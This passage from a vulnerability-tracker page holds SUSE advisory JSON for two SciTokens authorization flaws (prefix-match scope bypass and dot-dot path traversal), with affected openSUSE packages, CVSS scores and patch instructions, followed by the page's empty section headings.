          "details": "critical"
        }
      ],
      "title": "CVE-2026-32714"
    },
    {
      "cve": "CVE-2026-32716",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-32716"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.6, the Enforcer incorrectly validates scope paths by using a simple prefix match (startswith). This allows a token with access to a specific path (e.g., /john) to also access sibling paths that start with the same prefix (e.g., /johnathan, /johnny), which is an Authorization Bypass. This issue has been patched in version 1.9.6.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.aarch64",
          "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.ppc64le",
          "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.s390x",
          "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.x86_64",
          "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.aarch64",
          "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.ppc64le",
          "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.s390x",
          "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.x86_64",
          "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.aarch64",
          "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.ppc64le",
          "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.s390x",
          "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-32716",
          "url": "https://www.suse.com/security/cve/CVE-2026-32716"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1261202 for CVE-2026-32716",
          "url": "https://bugzilla.suse.com/1261202"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.x86_64",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.x86_64",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.x86_64",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.x86_64",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-04-04T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2026-32716"
    },
    {
      "cve": "CVE-2026-32727",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-32727"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.7, the Enforcer is vulnerable to a path traversal attack where an attacker can use dot-dot (..) in the scope claim of a token to escape the intended directory restriction. This occurs because the library normalizes both the authorized path (from the token) and the requested path (from the application) before comparing them using startswith. This issue has been patched in version 1.9.7.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.aarch64",
          "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.ppc64le",
          "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.s390x",
          "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.x86_64",
          "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.aarch64",
          "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.ppc64le",
          "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.s390x",
          "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.x86_64",
          "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.aarch64",
          "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.ppc64le",
          "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.s390x",
          "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-32727",
          "url": "https://www.suse.com/security/cve/CVE-2026-32727"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1261201 for CVE-2026-32727",
          "url": "https://bugzilla.suse.com/1261201"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.x86_64",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.x86_64",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python311-scitokens-1.8.1-2.1.x86_64",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python313-scitokens-1.8.1-2.1.x86_64",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.aarch64",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.ppc64le",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.s390x",
            "openSUSE Tumbleweed:python314-scitokens-1.8.1-2.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-04-04T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2026-32727"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-32714 (GCVE-0-2026-32714)

GHSA-RH5M-2482-966C

Summary

Details

Vulnerable Code Snippets

PoC

Impact

MITIGATION AND WORKAROUNDS

FKIE_CVE-2026-32714

OPENSUSE-SU-2026:10491-1

Tags

Sightings

Nomenclature